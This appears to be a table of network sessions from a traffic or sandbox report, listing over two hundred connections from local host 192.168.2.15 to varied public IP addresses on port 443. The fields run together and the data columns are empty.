                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20066192.168.2.153725874.227.152.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20067192.168.2.1537176112.171.151.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20068192.168.2.1554722159.242.188.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20069192.168.2.1555002140.238.96.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20070192.168.2.153897669.77.188.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20071192.168.2.1549184152.212.61.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20072192.168.2.1560424172.70.124.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20073192.168.2.1554518136.190.69.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20074192.168.2.155492819.239.246.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20075192.168.2.1536520140.210.149.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20076192.168.2.1539492109.1.20.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20077192.168.2.153729469.201.67.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20078192.168.2.1554988152.173.84.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20079192.168.2.1533806137.199.84.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20080192.168.2.1555752191.45.78.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20081192.168.2.1536600132.74.101.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20082192.168.2.1536394182.41.240.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20083192.168.2.153295885.139.21.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20084192.168.2.1543214140.153.142.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20085192.168.2.155522886.213.28.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20086192.168.2.155122261.175.120.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20087192.168.2.153681849.206.195.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20088192.168.2.155652490.154.111.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20089192.168.2.1540430157.138.66.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20090192.168.2.154684614.8.196.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20091192.168.2.1553734142.41.225.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20092192.168.2.1540652107.195.62.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20093192.168.2.1545662129.211.129.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20094192.168.2.1535666168.48.179.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20095192.168.2.1551314182.241.136.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20096192.168.2.1553468212.188.130.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20097192.168.2.1541926112.170.171.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20098192.168.2.15353829.105.133.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20099192.168.2.154616844.5.83.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20100192.168.2.1551116130.54.115.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20101192.168.2.155070664.4.0.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20102192.168.2.1542292144.202.254.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20103192.168.2.1557724132.5.49.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20104192.168.2.154442839.126.205.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20105192.168.2.154708074.120.40.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20106192.168.2.1536762180.3.44.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20107192.168.2.1543680100.58.30.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20108192.168.2.1551320102.81.250.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20109192.168.2.1546294137.56.117.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20110192.168.2.1553004153.7.211.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20111192.168.2.1557354104.193.178.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20112192.168.2.1557398196.60.80.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20113192.168.2.1553870183.97.82.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20114192.168.2.1547252126.18.24.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20115192.168.2.153481840.115.58.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20116192.168.2.1535790187.37.13.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20117192.168.2.1543514106.85.18.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20118192.168.2.1550550204.121.132.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20119192.168.2.1551894184.69.19.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20120192.168.2.1545764136.190.89.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20121192.168.2.1554662102.65.112.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20122192.168.2.1539602157.245.27.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20123192.168.2.155270883.112.29.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20124192.168.2.1552806181.198.172.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20125192.168.2.1553896199.119.65.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20126192.168.2.1553520120.136.83.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20127192.168.2.1536352153.43.183.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20128192.168.2.155633668.161.98.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20129192.168.2.155322681.112.21.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20130192.168.2.155918885.26.214.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20131192.168.2.1539090143.118.163.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20132192.168.2.1539442150.202.228.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20133192.168.2.1543540141.62.111.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20134192.168.2.15549502.27.160.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20135192.168.2.1535894122.172.174.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20136192.168.2.1550170140.215.65.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20137192.168.2.1540046216.251.91.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20138192.168.2.153677840.48.193.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20139192.168.2.155926658.130.225.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20140192.168.2.1545284207.254.134.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20141192.168.2.153333496.181.67.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20142192.168.2.1534322177.64.135.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20143192.168.2.1534796204.237.6.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20144192.168.2.154037894.28.186.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20145192.168.2.1552630189.182.73.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20146192.168.2.1556294210.167.192.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20147192.168.2.154911479.179.155.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20148192.168.2.15607561.253.47.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20149192.168.2.1549574143.14.61.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20150192.168.2.155203859.71.231.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20151192.168.2.153542620.156.233.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20152192.168.2.1544668211.147.137.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20153192.168.2.15403049.2.237.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20154192.168.2.1551184160.163.19.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20155192.168.2.1541344157.153.139.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20156192.168.2.1547136115.225.44.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20157192.168.2.154253667.181.168.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20158192.168.2.1558270166.21.255.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20159192.168.2.155301647.102.66.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20160192.168.2.1552370107.6.11.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20161192.168.2.154102644.94.51.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20162192.168.2.1557572131.76.67.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20163192.168.2.1548376114.188.31.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20164192.168.2.1538020176.245.182.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20165192.168.2.155907444.196.187.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20166192.168.2.15600809.126.76.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20167192.168.2.1552320200.183.83.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20168192.168.2.15477844.155.217.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20169192.168.2.1536780122.117.184.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20170192.168.2.1540074208.242.128.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20171192.168.2.1554160171.109.62.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20172192.168.2.1540900154.182.95.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20173192.168.2.1557792145.26.39.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20174192.168.2.154373038.216.55.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20175192.168.2.1548872188.74.220.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20176192.168.2.1548998141.108.9.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20177192.168.2.1555524219.111.195.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20178192.168.2.1546614200.80.6.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20179192.168.2.1538624156.214.58.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20180192.168.2.1557874152.156.194.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20181192.168.2.154513299.120.21.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20182192.168.2.153307214.99.9.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20183192.168.2.15365441.104.8.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20184192.168.2.154315268.34.171.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20185192.168.2.1555322121.143.27.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20186192.168.2.1541330126.93.65.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20187192.168.2.1555952206.244.177.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20188192.168.2.156038840.222.29.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20189192.168.2.155056453.112.85.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20190192.168.2.1544330211.45.208.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20191192.168.2.154015658.181.29.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20192192.168.2.1551602139.204.76.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20193192.168.2.1555800156.142.147.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20194192.168.2.1546568165.172.150.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20195192.168.2.155655844.38.127.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20196192.168.2.1541010179.91.41.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20197192.168.2.154914091.18.151.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20198192.168.2.1556926110.12.168.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20199192.168.2.1544828136.21.176.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20200192.168.2.153324286.248.123.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20201192.168.2.1533482109.179.161.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20202192.168.2.1540508216.239.160.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20203192.168.2.154919619.48.2.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20204192.168.2.155690412.116.57.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20205192.168.2.1544010108.130.172.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20206192.168.2.1551990126.26.154.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20207192.168.2.1540044161.215.59.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20208192.168.2.153774239.16.234.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20209192.168.2.153723094.39.86.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20210192.168.2.154181072.170.131.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20211192.168.2.155776675.12.61.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20212192.168.2.1543208103.136.174.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20213192.168.2.1550448171.54.11.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20214192.168.2.155066665.145.9.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20215192.168.2.155879694.116.163.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20216192.168.2.155148648.250.81.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20217192.168.2.1559024174.219.152.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20218192.168.2.153836885.253.111.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20219192.168.2.153337245.103.142.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20220192.168.2.1535962183.181.123.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20221192.168.2.1547412157.43.254.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20222192.168.2.154051054.242.189.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20223192.168.2.1540882144.29.239.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20224192.168.2.154111831.204.158.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20225192.168.2.155508632.17.199.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20226192.168.2.153574873.211.138.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20227192.168.2.1537352145.0.197.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20228192.168.2.153646852.116.173.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20229192.168.2.1556256126.94.72.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20230192.168.2.1537708160.192.120.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20231192.168.2.1542600145.34.197.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20232192.168.2.153433435.225.150.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20233192.168.2.1547408200.94.191.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20234192.168.2.153421062.229.33.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20235192.168.2.1548062195.146.37.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20236192.168.2.153707432.62.97.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20237192.168.2.153736865.206.118.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20238192.168.2.1539830202.131.45.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20239192.168.2.154503064.25.215.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20240192.168.2.1557636157.204.161.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20241192.168.2.1555848122.91.229.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20242192.168.2.153390814.166.115.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20243192.168.2.1543354147.126.102.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20244192.168.2.1537394202.234.213.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20245192.168.2.15350709.51.75.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20246192.168.2.155261276.161.159.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20247192.168.2.1551036133.24.138.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20248192.168.2.1543762140.1.155.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20249192.168.2.154345869.106.251.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20250192.168.2.154221442.229.232.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20251192.168.2.153405057.38.58.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20252192.168.2.1553762135.255.108.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20253192.168.2.1539896191.182.148.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20254192.168.2.153826257.86.222.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20255192.168.2.1551870191.166.150.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20256192.168.2.1534006148.176.119.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20257192.168.2.1552140136.24.193.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20258192.168.2.1550904156.219.153.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20259192.168.2.1547334168.53.63.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20260192.168.2.155796489.160.124.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20261192.168.2.1551294133.245.17.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20262192.168.2.155359623.64.116.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20263192.168.2.1539232144.116.186.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20264192.168.2.1547078122.228.236.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20265192.168.2.155915868.243.41.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20266192.168.2.154238899.243.29.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20267192.168.2.1534794162.41.110.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20268192.168.2.1540410171.243.121.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20269192.168.2.1536872157.234.104.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20270192.168.2.1560324217.53.233.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20271192.168.2.154921461.48.104.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20272192.168.2.1547344170.113.149.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20273192.168.2.1540470148.118.247.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20274192.168.2.1535820200.94.42.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20275192.168.2.1546336162.248.42.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20276192.168.2.153503665.229.136.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20277192.168.2.155255053.198.193.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20278192.168.2.1542552120.144.189.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20279192.168.2.1559316162.54.82.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20280192.168.2.1558474102.40.166.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20281192.168.2.1543790204.247.95.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20282192.168.2.155025813.205.62.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20283192.168.2.154056084.219.91.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20284192.168.2.155552250.55.248.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20285192.168.2.1544288115.164.21.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20286192.168.2.153380835.224.33.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
